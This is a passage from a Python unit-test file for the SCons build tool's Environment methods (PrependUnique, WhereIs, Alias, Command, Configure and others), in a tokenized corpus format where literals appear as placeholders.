r'<STR_LIT>' } ) <EOL> env1 . PrependENVPath ( '<STR_LIT>' , r'<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . PrependENVPath ( '<STR_LIT>' , r'<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . PrependENVPath ( '<STR_LIT>' , r'<STR_LIT>' , '<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . PrependENVPath ( '<STR_LIT>' , r'<STR_LIT>' , '<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . PrependENVPath ( '<STR_LIT>' , r'<STR_LIT>' , '<STR_LIT>' , sep = '<STR_LIT:;>' , delete_existing = <NUM_LIT:0> ) <EOL> assert ( env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] == r'<STR_LIT>' ) <EOL> assert ( env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] == r'<STR_LIT>' ) <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> test . subdir ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> p = env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> env1 . PrependENVPath ( '<STR_LIT>' , '<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . PrependENVPath ( '<STR_LIT>' , env1 . fs . Dir ( '<STR_LIT>' ) , sep = '<STR_LIT:;>' ) <EOL> assert env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT>' + p , env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> def test_PrependUnique ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( AAA1 = '<STR_LIT>' , <EOL> AAA2 = '<STR_LIT>' , <EOL> AAA3 = '<STR_LIT>' , <EOL> AAA4 = '<STR_LIT>' , <EOL> AAA5 = '<STR_LIT>' , <EOL> BBB1 = [ '<STR_LIT>' ] , <EOL> BBB2 = [ '<STR_LIT>' ] , <EOL> BBB3 = [ '<STR_LIT>' ] , <EOL> BBB4 = [ '<STR_LIT>' ] , <EOL> BBB5 = [ '<STR_LIT>' ] , <EOL> CCC1 = '<STR_LIT>' , <EOL> CCC2 = '<STR_LIT>' , <EOL> DDD1 = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] ) <EOL> env . PrependUnique ( AAA1 = '<STR_LIT>' , <EOL> AAA2 = [ '<STR_LIT>' ] , <EOL> AAA3 = [ '<STR_LIT>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT:b>' , '<STR_LIT>' ] , <EOL> AAA4 = '<STR_LIT>' , <EOL> AAA5 = [ '<STR_LIT>' ] , <EOL> BBB1 = '<STR_LIT>' , <EOL> BBB2 = [ '<STR_LIT>' ] , <EOL> BBB3 = [ '<STR_LIT>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT>' ] , <EOL> BBB4 = '<STR_LIT>' , <EOL> BBB5 = [ '<STR_LIT>' ] , <EOL> CCC1 = '<STR_LIT>' , <EOL> CCC2 = [ '<STR_LIT>' ] , <EOL> DDD1 = '<STR_LIT:b>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:c>' , '<STR_LIT:b>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] , env [ '<STR_LIT>' ] <EOL> env . PrependUnique ( DDD1 = '<STR_LIT:b>' , delete_existing = <NUM_LIT:1> ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:b>' , '<STR_LIT:a>' , '<STR_LIT:c>' ] , env [ '<STR_LIT>' ] <EOL> env . PrependUnique ( DDD1 = [ '<STR_LIT:a>' , '<STR_LIT:c>' ] , delete_existing = <NUM_LIT:1> ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:a>' , '<STR_LIT:c>' , '<STR_LIT:b>' ] , env [ '<STR_LIT>' ] <EOL> env . PrependUnique ( DDD1 = [ '<STR_LIT:d>' , '<STR_LIT:e>' , '<STR_LIT:d>' ] , delete_existing = <NUM_LIT:1> ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:d>' , '<STR_LIT:e>' , '<STR_LIT:a>' , '<STR_LIT:c>' , '<STR_LIT:b>' ] , env [ '<STR_LIT>' ] <EOL> env [ '<STR_LIT>' ] = CLVar ( [ ] ) <EOL> env . PrependUnique ( CLVar = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> if sys . version [ <NUM_LIT:0> ] == '<STR_LIT:1>' or sys . version [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> assert result == '<STR_LIT:bar>' , result <EOL> else : <EOL> assert isinstance ( result , CLVar ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:bar>' ] , result <EOL> env [ '<STR_LIT>' ] = CLVar ( [ '<STR_LIT:abc>' ] ) <EOL> env . PrependUnique ( CLVar = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> assert isinstance ( result , CLVar ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:bar>' , '<STR_LIT:abc>' ] , result <EOL> env [ '<STR_LIT>' ] = CLVar ( [ '<STR_LIT:bar>' ] ) <EOL> env . PrependUnique ( CLVar = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> assert isinstance ( result , CLVar ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:bar>' ] , result <EOL> def test_Replace ( self ) : <EOL> """<STR_LIT>""" <EOL> env1 = self . TestEnvironment ( AAA = '<STR_LIT:a>' , BBB = '<STR_LIT:b>' ) <EOL> env1 . Replace ( BBB = '<STR_LIT>' , CCC = '<STR_LIT>' ) <EOL> env2 = self . TestEnvironment ( AAA = '<STR_LIT:a>' , BBB = '<STR_LIT>' , CCC = '<STR_LIT>' ) <EOL> assert env1 == env2 , diff_env ( env1 , env2 ) <EOL> env3 = self . TestEnvironment ( BUILDERS = { '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> assert hasattr ( env3 , '<STR_LIT>' ) , "<STR_LIT>" <EOL> env3 . Replace ( BUILDERS = { '<STR_LIT>' : <NUM_LIT:2> } ) <EOL> assert not hasattr ( env3 , '<STR_LIT>' ) , "<STR_LIT>" <EOL> assert hasattr ( env3 , '<STR_LIT>' ) , "<STR_LIT>" <EOL> def test_ReplaceIxes ( self ) : <EOL> "<STR_LIT>" <EOL> env = self . TestEnvironment ( LIBPREFIX = '<STR_LIT>' , <EOL> LIBSUFFIX = '<STR_LIT>' , <EOL> SHLIBPREFIX = '<STR_LIT>' , <EOL> SHLIBSUFFIX = '<STR_LIT>' , <EOL> PREFIX = '<STR_LIT>' , <EOL> SUFFIX = '<STR_LIT>' ) <EOL> assert '<STR_LIT>' == env . ReplaceIxes ( '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) == env . ReplaceIxes ( os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert '<STR_LIT>' == env . ReplaceIxes ( '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_SetDefault ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( tools = [ ] ) <EOL> env . SetDefault ( V1 = <NUM_LIT:1> ) <EOL> env . SetDefault ( V1 = <NUM_LIT:2> ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:1> <EOL> env [ '<STR_LIT>' ] = <NUM_LIT:2> <EOL> env . SetDefault ( V2 = <NUM_LIT:1> ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:2> <EOL> def test_Tool ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( LINK = '<STR_LIT>' , NONE = '<STR_LIT>' ) <EOL> exc_caught = None <EOL> try : <EOL> env . Tool ( '<STR_LIT>' ) <EOL> except SCons . Errors . EnvironmentError : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" <EOL> exc_caught = None <EOL> try : <EOL> env . Tool ( '<STR_LIT>' ) <EOL> except SCons . Errors . EnvironmentError : <EOL> exc_caught = <NUM_LIT:1> <EOL> assert exc_caught , "<STR_LIT>" <EOL> env . Tool ( '<STR_LIT>' , toolpath = [ '<STR_LIT>' ] ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> env . Tool ( '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> env = self . TestEnvironment ( tools = [ '<STR_LIT>' ] , toolpath = [ test . workpath ( '<STR_LIT>' ) ] ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> env . Tool ( '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> def test_WhereIs ( self ) : <EOL> """<STR_LIT>""" <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> sub1_xxx_exe = test . workpath ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> sub2_xxx_exe = test . workpath ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> sub3_xxx_exe = test . workpath ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> sub4_xxx_exe = test . workpath ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> test . subdir ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if sys . platform != '<STR_LIT:win32>' : <EOL> test . write ( sub1_xxx_exe , "<STR_LIT:\n>" ) <EOL> os . mkdir ( sub2_xxx_exe ) <EOL> test . write ( sub3_xxx_exe , "<STR_LIT:\n>" ) <EOL> os . chmod ( sub3_xxx_exe , <NUM_LIT:0> <NUM_LIT> ) <EOL> test . write ( sub4_xxx_exe , "<STR_LIT:\n>" ) <EOL> os . chmod ( sub4_xxx_exe , <NUM_LIT:0> <NUM_LIT> ) <EOL> env_path = os . environ [ '<STR_LIT>' ] <EOL> pathdirs_1234 = [ test . workpath ( '<STR_LIT>' ) , <EOL> test . workpath ( '<STR_LIT>' ) , <EOL> test . workpath ( '<STR_LIT>' ) , <EOL> test . workpath ( '<STR_LIT>' ) , <EOL> ] + string . split ( env_path , os . pathsep ) <EOL> pathdirs_1243 = [ test . workpath ( '<STR_LIT>' ) , <EOL> test . workpath ( '<STR_LIT>' ) , <EOL> test . workpath ( '<STR_LIT>' ) , <EOL> test . workpath ( '<STR_LIT>' ) , <EOL> ] + string . split ( env_path , os . pathsep ) <EOL> path = string . join ( pathdirs_1234 , os . pathsep ) <EOL> env = self . TestEnvironment ( ENV = { '<STR_LIT>' : path } ) <EOL> wi = env . WhereIs ( '<STR_LIT>' ) <EOL> assert wi == test . workpath ( sub3_xxx_exe ) , wi <EOL> wi = env . WhereIs ( '<STR_LIT>' , pathdirs_1243 ) <EOL> assert wi == test . workpath ( sub4_xxx_exe ) , wi <EOL> wi = env . WhereIs ( '<STR_LIT>' , string . join ( pathdirs_1243 , os . pathsep ) ) <EOL> assert wi == test . workpath ( sub4_xxx_exe ) , wi <EOL> wi = env . WhereIs ( '<STR_LIT>' , reject = sub3_xxx_exe ) <EOL> assert wi == test . workpath ( sub4_xxx_exe ) , wi <EOL> wi = env . WhereIs ( '<STR_LIT>' , pathdirs_1243 , reject = sub3_xxx_exe ) <EOL> assert wi == test . workpath ( sub4_xxx_exe ) , wi <EOL> path = string . join ( pathdirs_1243 , os . pathsep ) <EOL> env = self . TestEnvironment ( ENV = { '<STR_LIT>' : path } ) <EOL> wi = env . WhereIs ( '<STR_LIT>' ) <EOL> assert wi == test . workpath ( sub4_xxx_exe ) , wi <EOL> wi = env . WhereIs ( '<STR_LIT>' , pathdirs_1234 ) <EOL> assert wi == test . workpath ( sub3_xxx_exe ) , wi <EOL> wi = env . WhereIs ( '<STR_LIT>' , string . join ( pathdirs_1234 , os . pathsep ) ) <EOL> assert wi == test . workpath ( sub3_xxx_exe ) , wi <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> wi = env . WhereIs ( '<STR_LIT>' , pathext = '<STR_LIT>' ) <EOL> assert wi is None , wi <EOL> wi = env . WhereIs ( '<STR_LIT>' , pathext = '<STR_LIT>' ) <EOL> assert wi == test . workpath ( sub4_xxx_exe ) , wi <EOL> wi = env . WhereIs ( '<STR_LIT>' , path = pathdirs_1234 , pathext = '<STR_LIT>' ) <EOL> assert string . lower ( wi ) == string . lower ( test . workpath ( sub3_xxx_exe ) ) , wi <EOL> forward_slash = test . workpath ( '<STR_LIT>' ) + '<STR_LIT>' <EOL> wi = env . WhereIs ( '<STR_LIT>' , path = forward_slash , pathext = '<STR_LIT>' ) <EOL> assert string . lower ( wi ) == string . lower ( test . workpath ( sub3_xxx_exe ) ) , wi <EOL> def test_Action ( self ) : <EOL> """<STR_LIT>""" <EOL> import SCons . Action <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' ) <EOL> a = env . Action ( '<STR_LIT:foo>' ) <EOL> assert a , a <EOL> assert a . __class__ is SCons . Action . CommandAction , a . __class__ <EOL> a = env . Action ( '<STR_LIT>' ) <EOL> assert a , a <EOL> assert a . __class__ is SCons . Action . CommandAction , a . __class__ <EOL> a = env . Action ( '<STR_LIT>' ) <EOL> assert a , a <EOL> assert a . __class__ is SCons . Action . LazyAction , a . __class__ <EOL> a = env . Action ( [ '<STR_LIT>' , '<STR_LIT:foo>' ] ) <EOL> assert a , a <EOL> assert a . __class__ is SCons . Action . ListAction , a . __class__ <EOL> def func ( arg ) : <EOL> pass <EOL> a = env . Action ( func ) <EOL> assert a , a <EOL> assert a . __class__ is SCons . Action . FunctionAction , a . __class__ <EOL> def test_AddPostAction ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> n = env . AddPostAction ( '<STR_LIT>' , lambda x : x ) <EOL> assert str ( n [ <NUM_LIT:0> ] ) == '<STR_LIT>' , n [ <NUM_LIT:0> ] <EOL> n = env . AddPostAction ( [ '<STR_LIT>' , '<STR_LIT>' ] , lambda x : x ) <EOL> assert str ( n [ <NUM_LIT:0> ] ) == '<STR_LIT>' , n [ <NUM_LIT:0> ] <EOL> assert str ( n [ <NUM_LIT:1> ] ) == '<STR_LIT>' , n [ <NUM_LIT:1> ] <EOL> def test_AddPreAction ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> n = env . AddPreAction ( '<STR_LIT>' , lambda x : x ) <EOL> assert str ( n [ <NUM_LIT:0> ] ) == '<STR_LIT>' , n [ <NUM_LIT:0> ] <EOL> n = env . AddPreAction ( [ '<STR_LIT>' , '<STR_LIT>' ] , lambda x : x ) <EOL> assert str ( n [ <NUM_LIT:0> ] ) == '<STR_LIT>' , n [ <NUM_LIT:0> ] <EOL> assert str ( n [ <NUM_LIT:1> ] ) == '<STR_LIT>' , n [ <NUM_LIT:1> ] <EOL> def test_Alias ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' , EA = '<STR_LIT>' ) <EOL> tgt = env . Alias ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert str ( tgt ) == '<STR_LIT>' , tgt <EOL> assert tgt . sources == [ ] , tgt . sources <EOL> assert not hasattr ( tgt , '<STR_LIT>' ) , tgt . builder <EOL> tgt = env . Alias ( '<STR_LIT>' , None ) [ <NUM_LIT:0> ] <EOL> assert str ( tgt ) == '<STR_LIT>' , tgt <EOL> assert tgt . sources == [ ] , tgt . sources <EOL> tgt = env . Alias ( '<STR_LIT>' , [ ] ) [ <NUM_LIT:0> ] <EOL> assert str ( tgt ) == '<STR_LIT>' , tgt <EOL> assert tgt . sources == [ ] , tgt . sources <EOL> tgt = env . Alias ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> assert str ( tgt ) == '<STR_LIT>' , tgt <EOL> assert len ( tgt . sources ) == <NUM_LIT:2> , map ( str , tgt . sources ) <EOL> assert str ( tgt . sources [ <NUM_LIT:0> ] ) == '<STR_LIT>' , map ( str , tgt . sources ) <EOL> assert str ( tgt . sources [ <NUM_LIT:1> ] ) == '<STR_LIT>' , map ( str , tgt . sources ) <EOL> n = env . Alias ( tgt , source = [ '<STR_LIT>' , '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> assert n is tgt , n <EOL> assert len ( tgt . sources ) == <NUM_LIT:4> , map ( str , tgt . sources ) <EOL> assert str ( tgt . sources [ <NUM_LIT:2> ] ) == '<STR_LIT>' , map ( str , tgt . sources ) <EOL> assert str ( tgt . sources [ <NUM_LIT:3> ] ) == '<STR_LIT>' , map ( str , tgt . sources ) <EOL> n = env . Alias ( '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert n is tgt , n <EOL> assert len ( tgt . sources ) == <NUM_LIT:5> , map ( str , tgt . sources ) <EOL> assert str ( tgt . sources [ <NUM_LIT:4> ] ) == '<STR_LIT>' , map ( str , tgt . sources ) <EOL> t1 , t2 = env . Alias ( [ '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert str ( t1 ) == '<STR_LIT>' , t1 <EOL> assert str ( t2 ) == '<STR_LIT>' , t2 <EOL> assert len ( t1 . sources ) == <NUM_LIT:2> , map ( str , t1 . sources ) <EOL> assert str ( t1 . sources [ <NUM_LIT:0> ] ) == '<STR_LIT>' , map ( str , t1 . sources ) <EOL> assert str ( t1 . sources [ <NUM_LIT:1> ] ) == '<STR_LIT>' , map ( str , t1 . sources ) <EOL> assert len ( t2 . sources ) == <NUM_LIT:2> , map ( str , t2 . sources ) <EOL> assert str ( t2 . sources [ <NUM_LIT:0> ] ) == '<STR_LIT>' , map ( str , t2 . sources ) <EOL> assert str ( t2 . sources [ <NUM_LIT:1> ] ) == '<STR_LIT>' , map ( str , t2 . sources ) <EOL> tgt = env . Alias ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> tgt = env . Alias ( '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> s = map ( str , tgt . sources ) <EOL> assert s == [ '<STR_LIT>' , '<STR_LIT>' ] , s <EOL> tgt = env . Alias ( tgt , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> s = map ( str , tgt . sources ) <EOL> assert s == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , s <EOL> tgt = env . Alias ( '<STR_LIT>' , None , "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> s = str ( tgt . builder . action ) <EOL> assert s == "<STR_LIT>" , s <EOL> tgt = env . Alias ( '<STR_LIT>' , None , "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> s = str ( tgt . builder . action ) <EOL> assert s == "<STR_LIT>" , s <EOL> tgt = env . Alias ( tgt , None , "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> s = str ( tgt . builder . action ) <EOL> assert s == "<STR_LIT>" , s <EOL> def test_AlwaysBuild ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> t = env . AlwaysBuild ( '<STR_LIT:a>' , '<STR_LIT>' , [ '<STR_LIT:c>' , '<STR_LIT:d>' ] , '<STR_LIT>' , <EOL> env . fs . Dir ( '<STR_LIT>' ) , env . fs . File ( '<STR_LIT:file>' ) ) <EOL> assert t [ <NUM_LIT:0> ] . __class__ . __name__ == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:0> ] . path == '<STR_LIT:a>' <EOL> assert t [ <NUM_LIT:0> ] . always_build <EOL> assert t [ <NUM_LIT:1> ] . __class__ . __name__ == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:1> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:1> ] . always_build <EOL> assert t [ <NUM_LIT:2> ] . __class__ . __name__ == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:2> ] . path == '<STR_LIT:c>' <EOL> assert t [ <NUM_LIT:2> ] . always_build <EOL> assert t [ <NUM_LIT:3> ] . __class__ . __name__ == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:3> ] . path == '<STR_LIT:d>' <EOL> assert t [ <NUM_LIT:3> ] . always_build <EOL> assert t [ <NUM_LIT:4> ] . __class__ . __name__ == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:4> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:4> ] . always_build <EOL> assert t [ <NUM_LIT:5> ] . __class__ . __name__ == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:5> ] . path == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:5> ] . always_build <EOL> assert t [ <NUM_LIT:6> ] . __class__ . __name__ == '<STR_LIT>' <EOL> assert t [ <NUM_LIT:6> ] . path == '<STR_LIT:file>' <EOL> assert t [ <NUM_LIT:6> ] . always_build <EOL> def test_VariantDir ( self ) : <EOL> """<STR_LIT>""" <EOL> class MyFS : <EOL> def Dir ( self , name ) : <EOL> return name <EOL> def VariantDir ( self , variant_dir , src_dir , duplicate ) : <EOL> self . variant_dir = variant_dir <EOL> self . src_dir = src_dir <EOL> self . duplicate = duplicate <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> env . fs = MyFS ( ) <EOL> env . VariantDir ( '<STR_LIT>' , '<STR_LIT:src>' ) <EOL> assert env . fs . variant_dir == '<STR_LIT>' , env . fs . variant_dir <EOL> assert env . fs . src_dir == '<STR_LIT:src>' , env . fs . src_dir <EOL> assert env . fs . duplicate == <NUM_LIT:1> , env . fs . duplicate <EOL> env . VariantDir ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> assert env . fs . variant_dir == '<STR_LIT>' , env . fs . variant_dir <EOL> assert env . fs . src_dir == '<STR_LIT>' , env . fs . src_dir <EOL> assert env . fs . duplicate == <NUM_LIT:0> , env . fs . duplicate <EOL> def test_Builder ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' ) <EOL> b = env . Builder ( action = '<STR_LIT:foo>' ) <EOL> assert not b is None , b <EOL> b = env . Builder ( action = '<STR_LIT>' ) <EOL> assert not b is None , b <EOL> b = env . Builder ( action = [ '<STR_LIT>' , '<STR_LIT:foo>' ] ) <EOL> assert not b is None , b <EOL> def func ( arg ) : <EOL> pass <EOL> b = env . Builder ( action = func ) <EOL> assert not b is None , b <EOL> b = env . Builder ( generator = func ) <EOL> assert not b is None , b <EOL> def test_CacheDir ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( CD = '<STR_LIT>' ) <EOL> env . CacheDir ( '<STR_LIT:foo>' ) <EOL> assert env . _CacheDir_path == '<STR_LIT:foo>' , env . _CacheDir_path <EOL> env . CacheDir ( '<STR_LIT>' ) <EOL> assert env . _CacheDir_path == '<STR_LIT>' , env . _CacheDir_path <EOL> def test_Clean ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' , BAR = '<STR_LIT>' ) <EOL> CT = SCons . Environment . CleanTargets <EOL> foo = env . arg2nodes ( '<STR_LIT:foo>' ) [ <NUM_LIT:0> ] <EOL> fff = env . arg2nodes ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> t = env . Clean ( '<STR_LIT:foo>' , '<STR_LIT>' ) <EOL> l = map ( str , CT [ foo ] ) <EOL> assert l == [ '<STR_LIT>' ] , l <EOL> t = env . Clean ( foo , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> l = map ( str , CT [ foo ] ) <EOL> assert l == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , l <EOL> eee = env . arg2nodes ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> t = env . Clean ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> l = map ( str , CT [ fff ] ) <EOL> assert l == [ '<STR_LIT>' ] , l <EOL> t = env . Clean ( fff , [ eee , '<STR_LIT>' ] ) <EOL> l = map ( str , CT [ fff ] ) <EOL> assert l == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , l <EOL> def test_Command ( self ) : <EOL> """<STR_LIT>""" <EOL> env = Environment ( ) <EOL> t = env . Command ( target = '<STR_LIT>' , source = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> action = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert not t . builder is None <EOL> assert t . builder . action . __class__ . __name__ == '<STR_LIT>' <EOL> assert t . builder . action . cmd_list == '<STR_LIT>' <EOL> assert '<STR_LIT>' in map ( lambda x : x . path , t . sources ) <EOL> assert '<STR_LIT>' in map ( lambda x : x . path , t . sources ) <EOL> sub = env . fs . Dir ( '<STR_LIT>' ) <EOL> t = env . Command ( target = '<STR_LIT>' , source = '<STR_LIT>' , <EOL> action = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert '<STR_LIT>' in map ( lambda x : x . path , t . sources ) <EOL> def testFunc ( env , target , source ) : <EOL> assert str ( target [ <NUM_LIT:0> ] ) == '<STR_LIT>' <EOL> assert '<STR_LIT>' in map ( str , source ) and '<STR_LIT>' in map ( str , source ) , map ( str , source ) <EOL> return <NUM_LIT:0> <EOL> t = env . Command ( target = '<STR_LIT>' , source = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> action = testFunc ) [ <NUM_LIT:0> ] <EOL> assert not t . builder is None <EOL> assert t . builder . action . __class__ . __name__ == '<STR_LIT>' <EOL> t . build ( ) <EOL> assert '<STR_LIT>' in map ( lambda x : x . path , t . sources ) <EOL> assert '<STR_LIT>' in map ( lambda x : x . path , t . sources ) <EOL> x = [ ] <EOL> def test2 ( baz , x = x ) : <EOL> x . append ( baz ) <EOL> env = self . TestEnvironment ( TEST2 = test2 ) <EOL> t = env . Command ( target = '<STR_LIT>' , source = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> XYZ = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert not t . builder is None <EOL> t . build ( ) <EOL> assert x [ <NUM_LIT:0> ] == '<STR_LIT>' , x <EOL> t = env . Command ( target = '<STR_LIT>' , source = '<STR_LIT>' , <EOL> action = '<STR_LIT:foo>' , <EOL> X = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert str ( t ) == '<STR_LIT>' , str ( t ) <EOL> assert '<STR_LIT>' in map ( lambda x : x . path , t . sources ) <EOL> env = self . TestEnvironment ( source_scanner = '<STR_LIT>' ) <EOL> t = env . Command ( target = '<STR_LIT>' , source = '<STR_LIT>' , <EOL> action = '<STR_LIT:foo>' , <EOL> source_scanner = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> assert t . builder . source_scanner == '<STR_LIT>' , t . builder . source_scanner <EOL> def test_Configure ( self ) : <EOL> """<STR_LIT>""" <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> save = os . getcwd ( ) <EOL> try : <EOL> os . chdir ( test . workpath ( ) ) <EOL> env = self . TestEnvironment ( FOO = '<STR_LIT>' ) <EOL> def func ( arg ) : <EOL> pass <EOL> c = env . Configure ( ) <EOL> assert not c is None , c <EOL> c . Finish ( ) <EOL> c = env . Configure ( custom_tests = { '<STR_LIT:foo>' : func , '<STR_LIT>' : func } ) <EOL> assert not c is None , c <EOL> assert hasattr ( c , '<STR_LIT:foo>' ) <EOL> assert hasattr ( c , '<STR_LIT>' ) <EOL> c . Finish ( ) 